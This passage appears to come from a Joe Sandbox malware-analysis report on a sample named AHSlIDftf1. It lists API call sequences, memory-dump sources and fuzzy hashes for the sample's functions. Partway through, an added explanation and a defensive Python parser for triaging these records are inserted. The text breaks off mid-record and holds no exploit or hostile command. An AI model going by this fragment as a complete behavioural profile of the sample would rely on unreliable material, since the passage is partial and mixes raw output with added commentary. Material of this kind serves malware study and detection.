• Opcode Fuzzy Hash: beda9b638c30d820cd45750b9b0adbaf9312c1644fc8b4fba5d5e849bb4d7cd5
• Instruction Fuzzy Hash: 7A21D331601158EFCB259F96CCA8EFABBB9EF89350F484055F5059B261C3319A91DB70
APIs
• GetFileAttributesW.KERNEL32(?,00DECB68), ref: 00DBD2FB
• GetLastError.KERNEL32 ref: 00DBD30A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00DBD319
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DECB68), ref: 00DBD376
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 52b8048ce9520ab2bd34159d23c552161859bb702a11f4b9f135ce6758b78600
• Instruction ID: 731078507ece5925930824064321b10c6a20c82ef0d55f575573ec90189ccd1b
• Opcode Fuzzy Hash: 52b8048ce9520ab2bd34159d23c552161859bb702a11f4b9f135ce6758b78600
• Instruction Fuzzy Hash: 6A218370505301DF8710EF68C8814AABBE5EE55364F544A1DF89AC73A2E731D94ACBB3
                                                                                                            APIs
                                                                                                               • Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00DB102A
                                                                                                               • Part of subcall function 00DB1014: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00DB1036
                                                                                                               • Part of subcall function 00DB1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00DB1045
                                                                                                               • Part of subcall function 00DB1014: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00DB104C
                                                                                                               • Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00DB1062
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DB15BE
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00DB15E1
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB1617
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB161E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1592001646-0
                                                                                                            • Opcode ID: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
                                                                                                            • Instruction ID: fc2502f11c5b2c20e3a126c9e3e7c10aab7920cfe7e480038a73de4c7172304a
                                                                                                            • Opcode Fuzzy Hash: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
                                                                                                            • Instruction Fuzzy Hash: DB214876E00209EFDB10DFA8C955BEEB7F8EF44354F588459E446AB241E730AA05CBB0
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00DE280A
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2824
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2832
                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DE2840
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                            • String ID:
                                                                                                            • API String ID: 2169480361-0
                                                                                                            • Opcode ID: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
                                                                                                            • Instruction ID: d4a8635744877e3ef0bd7e6cf7281391b8699956ace7535dc730073a83bec92c
                                                                                                            • Opcode Fuzzy Hash: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
                                                                                                            • Instruction Fuzzy Hash: 7F219231205691AFD714BB25C885F7A77A9EF85324F148158F826CB6A2C771EC42C7B0
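The API lists in these records are easier to triage in bulk than one function at a time. The block below is an added example, not Joe Sandbox's code and not code from the sample: it parses the record layout shown on this page (an "APIs" bullet list followed by "Memory Dump Source" and "Similarity" key/value bullets), decodes the 000000EC / 000000F0 index immediates to their GWL_* names, and flags two API combinations present in the records above: the privilege check entered at 00DB15BE (GetTokenInformation with class 3, which is TokenPrivileges, a size probe plus HeapAlloc, then LookupPrivilegeValueW followed by a _memcmp, consistent with comparing the looked-up LUID against the token's privilege array) and the transparent-window setup at 00DE280A (GWL_EXSTYLE rewrite followed by SetLayeredWindowAttributes with flag 2, LWA_ALPHA). The rule names, the sign-extension reading of the index cells, and the SAMPLE text are assumptions made for the example; SAMPLE is constructed by copying two of this page's records.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag API combinations.
Added example, not Joe Sandbox code. SAMPLE is constructed by copying two
records from this report (entries 00DB15BE and 00DE280A), trimmed to the
lines the parser needs; class 3 in GetTokenInformation is TokenPrivileges."""
import re

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}
RECORD_END = "Instruction Fuzzy Hash"  # last bullet of every record
# Assumption: the report prints the Get/SetWindowLong index as a zero-extended
# byte (000000EC); the real constants are negative, so 0x80..0xFF is sign-extended.
GWL_NAMES = {-4: "GWL_WNDPROC", -12: "GWL_ID", -16: "GWL_STYLE", -20: "GWL_EXSTYLE", -21: "GWL_USERDATA"}


def gwl_index(arg):
    """Map an argument cell such as '000000EC' to its GWL_* name, or None."""
    if not HEX8.match(arg):
        return None
    v = int(arg, 16)
    if 0x80 <= v < 0x100:
        v -= 0x100
    return GWL_NAMES.get(v)


def parse_records(text):
    """Split report text into records of {'apis': [...], 'meta': {...}}."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs" or (line in SECTION_HEADERS and cur is None):
            cur = {"apis": [], "meta": {}}  # a record may lack an APIs block
            records.append(cur)
        elif cur is None or line in SECTION_HEADERS:
            continue
        elif (m := API_RE.match(line)):
            args = m.group("args")
            cur["apis"].append({"name": m.group("name"), "args": args.split(",") if args else [],
                                "ref": m.group("ref"), "subcall": m.group("sub")})
        elif (m := KV_RE.match(line)):
            cur["meta"][m.group("key")] = m.group("val")
            if m.group("key") == RECORD_END:
                cur = None
    return records


def triage(rec):
    """Names of the triage rules that fire for one record (own and subcall APIs)."""
    names = {a["name"] for a in rec["apis"]}
    indexes = {gwl_index(a["args"][1]) for a in rec["apis"]
               if a["name"] in ("GetWindowLongW", "SetWindowLongW") and len(a["args"]) > 1}
    hits = []
    if {"GetTokenInformation", "LookupPrivilegeValueW"} <= names:
        hits.append("token-privilege-check")  # enumerate privileges, look one up, compare
    if "GWL_EXSTYLE" in indexes and "SetLayeredWindowAttributes" in names:
        hits.append("layered-window-alpha")  # WS_EX_LAYERED + LWA_ALPHA: see-through window
    if "GWL_STYLE" in indexes and "SetWindowLongW" in names:
        hits.append("window-style-rewrite")
    return hits


def summarize(text):
    """One triage row per record: entry address, own-call sequence, hashes, hits."""
    rows = []
    for rec in parse_records(text):
        own = [a for a in rec["apis"] if not a["subcall"]]
        rows.append({"entry": own[0]["ref"] if own else None,
                     "sequence": [a["name"] for a in own],
                     "api_id": rec["meta"].get("API ID", ""),
                     "opcode_hash": rec["meta"].get("Opcode Fuzzy Hash", ""),
                     "hits": triage(rec)})
    return rows


# Constructed sample: two records copied from this report, trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00DB102A
  • Part of subcall function 00DB1014: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00DB104C
  • Part of subcall function 00DB1014: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00DB1062
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DB15BE
• _memcmp.LIBVCRUNTIME ref: 00DB15E1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DB1617
• HeapFree.KERNEL32(00000000), ref: 00DB161E
Memory Dump Source
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• Opcode Fuzzy Hash: d51053e1e95a3902a398877284bcdb34803911b9ed4930a186fd8881d383a6a6
• Instruction Fuzzy Hash: DB214876E00209EFDB10DFA8C955BEEB7F8EF44354F588459E446AB241E730AA05CBB0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00DE280A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DE2824
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DE2840
Similarity
• API ID: Window$Long$AttributesLayered
• Opcode Fuzzy Hash: 013bbb1b434efcd40f881276b8847affde7abdb5db4cea998f74a344342c1f67
• Instruction Fuzzy Hash: 7F219231205691AFD714BB25C885F7A77A9EF85324F148158F826CB6A2C771EC42C7B0
"""
```

To use it on this report, pass the full record listing to summarize(): the "sequence" field lists only the function's own calls (subcall lines are kept in the parsed record but excluded from the entry address and sequence), so the first own call's ref is a stable handle for the function, and the Opcode Fuzzy Hash carried in each row can be matched against other reports for the same AutoIt runtime build.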
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?), ref: 00DB8D8C
                                                                                                              • Part of subcall function 00DB8D7D: lstrcpyW.KERNEL32(00000000,?,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB8DB2
                                                                                                              • Part of subcall function 00DB8D7D: lstrcmpiW.KERNEL32(00000000,?,00DB790A,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?), ref: 00DB8DE3
                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7923
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7949
                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DB8754,00000000,?,0000001C,?,?,00000000), ref: 00DB7984
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                            • String ID: cdecl
                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                            • Opcode ID: 3b46c19d868751a963e8e32c0d8ebb7db5b2bff5742c240f13ecfcb3a0abc755
                                                                                                            • Instruction ID: 7dfb364a0a210e4cef8e071fc742563b0e3d7332ee67f9b5adc19f18de3ce7b2
                                                                                                            • Opcode Fuzzy Hash: 3b46c19d868751a963e8e32c0d8ebb7db5b2bff5742c240f13ecfcb3a0abc755
                                                                                                            • Instruction Fuzzy Hash: 7311B43A201341EBCF15AF34D845DBA77A9FF85350B50502AF947CB264EB319811DB71
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE7D0B
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DE7D2A
                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DE7D42
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DCB7AD,00000000), ref: 00DE7D6B
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID:
                                                                                                            • API String ID: 847901565-0
                                                                                                            • Opcode ID: 2974d6e1848dc2e43f35cfc6d424c02b383ca6c3e5486fa4c12da0a96dc63967
                                                                                                            • Instruction ID: 37953ba04fdfdcfd920328fb95b9980336a947a180cfc0cf19165153faef02f1
                                                                                                            • Opcode Fuzzy Hash: 2974d6e1848dc2e43f35cfc6d424c02b383ca6c3e5486fa4c12da0a96dc63967
                                                                                                            • Instruction Fuzzy Hash: DE119031614695AFCB50AF29CC44ABA3BA5EF45360B194724F835DB2F0D7309D52DB70
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00DE56BB
                                                                                                            • _wcslen.LIBCMT ref: 00DE56CD
                                                                                                            • _wcslen.LIBCMT ref: 00DE56D8
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DE5816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 455545452-0
                                                                                                            • Opcode ID: 94b51ef35128c6fdb31f7b1ee7ad9fdb403e19ebf70af10c337c119866d9cf3b
                                                                                                            • Instruction ID: 6be466367b2d33451a35d5e6607788561b127ac0fd5fa015498ffe5c57e9e323
                                                                                                            • Opcode Fuzzy Hash: 94b51ef35128c6fdb31f7b1ee7ad9fdb403e19ebf70af10c337c119866d9cf3b
                                                                                                            • Instruction Fuzzy Hash: F311063160068996DF20BF62ECC1AEE376CEF113A8F14402AF949D6085E770CA80CF70
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf3144e142fa56e796694c49d744329063aa8a776ab7bc06491be7df4340992c
                                                                                                            • Instruction ID: 1bd06ca6b630f59aded9c9a1ee327aea03dc262d3dd8a0ce461a8b2af9b5ba79
                                                                                                            • Opcode Fuzzy Hash: cf3144e142fa56e796694c49d744329063aa8a776ab7bc06491be7df4340992c
                                                                                                            • Instruction Fuzzy Hash: 4A01ADF6209B1A7EF62136786CC0F27661DDF813B8B391725F521A12D2DB608C074370
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DB1A47
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A59
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A6F
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 72228c6e04ca2a3ac35521545bb74286d7b82dcdcc19340a1a7e65dfd5ef4a29
                                                                                                            • Instruction ID: c0d8add0983a57e1693458f569262e371ce01a1076bd61077817366bbc5f82fd
                                                                                                            • Opcode Fuzzy Hash: 72228c6e04ca2a3ac35521545bb74286d7b82dcdcc19340a1a7e65dfd5ef4a29
                                                                                                            • Instruction Fuzzy Hash: AD11273A901219FFEB109BA4C985FEDBB78EB08750F200091EA05B7290D671AE51DBA4
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DBE1FD
                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00DBE230
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DBE246
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DBE24D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2880819207-0
                                                                                                            • Opcode ID: 162c0de180a5b924e0ed6c9605fcec6f0a6a3a945acd853c47609c31a3fc489a
                                                                                                            • Instruction ID: d55d36454dfed2f7f895f61b1b0753b49a5ae87ab4c5c7fe2ebd059509e1a82d
                                                                                                            • Opcode Fuzzy Hash: 162c0de180a5b924e0ed6c9605fcec6f0a6a3a945acd853c47609c31a3fc489a
                                                                                                            • Instruction Fuzzy Hash: 52110472904354BFC711EBA89C49ADE7FADAB45320F144259F826E3391D6B0DE0587B0
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,?,00D7CFF9,00000000,00000004,00000000), ref: 00D7D218
                                                                                                            • GetLastError.KERNEL32 ref: 00D7D224
                                                                                                            • __dosmaperr.LIBCMT ref: 00D7D22B
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00D7D249
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                            • String ID:
                                                                                                            • API String ID: 173952441-0
                                                                                                            • Opcode ID: badace7a70533e4ce65759f11523e7130b171c722e39c1452bc2f668180d00ea
                                                                                                            • Instruction ID: cded1cf207de4bfea29924b86fec6afc2ffae9ee2f0a886db96d31d921216f21
                                                                                                            • Opcode Fuzzy Hash: badace7a70533e4ce65759f11523e7130b171c722e39c1452bc2f668180d00ea
                                                                                                            • Instruction Fuzzy Hash: A301D6364153047BC7216BA5DC05BAA7A7ADF81731F248219FD29D61D1EB70C902C6B0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • GetClientRect.USER32(?,?), ref: 00DE9F31
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9F3B
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE9F46
                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00DE9F7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4127811313-0
                                                                                                            • Opcode ID: 515f59b05fe2700b0eaa2ecad6f9ed2f64feb994c25a02a0015b7d2dc66a4b83
                                                                                                            • Instruction ID: 6a26d566ba080926f2c822efa4a4b9f465592041b3539c6e37c8593b05fcb8ef
                                                                                                            • Opcode Fuzzy Hash: 515f59b05fe2700b0eaa2ecad6f9ed2f64feb994c25a02a0015b7d2dc66a4b83
                                                                                                            • Instruction Fuzzy Hash: CA11887290129AABCB10EF6AD8959EEB7B8FF45301F440451F801E7141C330FA82CBB1
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00D56060
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3970641297-0
                                                                                                            • Opcode ID: 113ce1811895e440816f3deecd7c46cbcdffd75c915fb8d5210de566c8f72f2a
                                                                                                            • Instruction ID: 308934239f1533e104e62f2bdc2c93f101608eeb2fd17650df6616a3ad7458d5
                                                                                                            • Opcode Fuzzy Hash: 113ce1811895e440816f3deecd7c46cbcdffd75c915fb8d5210de566c8f72f2a
                                                                                                            • Instruction Fuzzy Hash: 7011AD72101648BFEF125FA8CC84EEABB69EF083A5F440205FE0496160CB32DC61DBB0
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00D73B56
                                                                                                              • Part of subcall function 00D73AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D73AD2
                                                                                                              • Part of subcall function 00D73AA3: ___AdjustPointer.LIBCMT ref: 00D73AED
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00D73B6B
